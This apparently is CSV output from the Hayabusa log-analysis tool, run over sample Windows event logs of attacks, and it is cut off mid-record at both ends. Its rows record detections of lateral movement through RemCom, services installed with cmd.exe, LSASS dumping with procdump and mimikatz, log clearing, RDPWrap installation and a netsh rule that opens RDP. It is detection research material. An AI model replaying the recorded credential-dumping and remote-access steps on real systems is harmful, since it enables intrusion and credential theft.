365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 
+09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | 
Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 
0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service 
Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 
365ABB72-9B85-5C8E-0000-0010C4CC1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 
365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File 
Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 
365ABB72-AB70-5C8E-0000-0010DF1F0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,../hayabusa-rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 
365ABB72-AB81-5C8E-0000-001024960C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 